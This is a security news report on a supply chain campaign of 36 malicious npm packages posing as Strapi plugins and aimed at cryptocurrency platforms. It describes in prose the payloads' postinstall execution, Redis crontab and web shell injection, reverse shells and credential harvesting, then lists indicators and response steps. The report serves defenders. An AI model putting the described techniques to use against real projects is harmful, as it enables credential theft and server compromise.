36 Fake Strapi Plugins Deploy Redis RCE and Credential Stealers

Security researchers have uncovered 36 malicious packages in the npm registry disguised as Strapi CMS plugins, part of a coordinated supply chain campaign targeting cryptocurrency platforms. The packages deployed eight distinct malware variants capable of Redis exploitation, credential harvesting, and persistent reverse shell access.

Unlike typical npm spam campaigns that recycle identical payloads, this operation deployed progressively sophisticated malware, suggesting active development and likely targeting specific organizations rather than opportunistic mass infection.

Campaign Mechanics

All 36 packages follow the naming convention "strapi-plugin-" followed by legitimate-sounding terms like "cron," "database," "server," "health," and "api." Four sock puppet accounts distributed the packages over a 13-hour window: "umarbek1233," "kekylf12," "tikeqemif26," and "umar_bektembiev1."

The malicious code executes through npm's postinstall hook, meaning it runs automatically during npm install without requiring any additional action from developers. This is particularly dangerous in CI/CD pipelines and containerized environments where packages are installed with elevated privileges.

Version spoofing added credibility—all packages used version 3.6.8 to appear mature and established rather than newly published.

Payload Capabilities

The eight malware variants demonstrate a methodical escalation of capabilities:

Redis exploitation - Injecting crontab entries to download and execute shell scripts, plus writing PHP web shells and Node.js reverse shells to Strapi's public uploads directory.

Environment reconnaissance - Scanning for system variables, PostgreSQL connection strings, and Strapi configuration files.

Credential harvesting - Dumping environment variables, extracting Redis databases via INFO/DBSIZE/KEYS commands, and collecting Docker and Kubernetes secrets.

PostgreSQL exploitation - Direct database connections using hardcoded credentials, querying Strapi-specific tables for sensitive data. The queries specifically target cryptocurrency-related patterns: wallet, transaction, deposit, withdraw, hot, cold, balance.

Persistent implants - Maintaining reverse shell access to a hardcoded hostname "prod-strapi," suggesting specific targeting rather than opportunistic attacks.

Cryptocurrency Focus

The targeting patterns strongly indicate this campaign aimed at cryptocurrency platforms running Strapi as their content management backend. The hardcoded database credentials, Guardarian API targeting, and cryptocurrency wallet enumeration reveal the attackers' objectives.

This aligns with the broader trend of supply chain attacks targeting crypto infrastructure. The low-friction nature of npm package installation combined with the high-value targets in cryptocurrency makes this attack vector increasingly attractive to financially motivated threat actors.

Detection and Response

Organizations using Strapi should audit their package.json and package-lock.json files for any packages matching the naming patterns identified in this campaign. The full list of malicious package names includes variations with "nordica," "guardarian," "finseven," and "hextest" prefixes alongside generic plugin names.

Key indicators:

• Packages with missing metadata (no description, repository, or homepage)
• Version 3.6.8 with recent publish dates
• Postinstall scripts executing network operations or spawning shells

For organizations that may have installed these packages, assume compromise. Rotate all credentials accessible from the affected systems, review Redis and PostgreSQL logs for unauthorized queries, and scan for persistent backdoors in web-accessible directories.

Supply Chain Lessons

This campaign reinforces several supply chain security practices. Using package-lock.json or yarn.lock files prevents automatic installation of new package versions. Security scanning tools like Socket, Snyk, or npm audit should be integrated into CI/CD pipelines.

The ongoing wave of supply chain attacks demonstrates that package repositories remain a soft target. Attackers invest relatively little effort to reach a potentially large victim pool. The postinstall hook, in particular, represents a fundamental design flaw in npm's security model—arbitrary code execution during installation should require explicit opt-in rather than being the default behavior.

For developers evaluating new packages, verify package authorship, check publication history, and be suspicious of packages with minimal documentation or recent account creation. The 13-hour distribution window in this campaign would have been detectable by monitoring for bulk package publications from new accounts.

Strapi has not indicated whether the legitimate ecosystem was specifically targeted or if the attackers simply recognized Strapi's popularity among cryptocurrency platforms. Either way, the CMS's large install base made it an attractive impersonation target.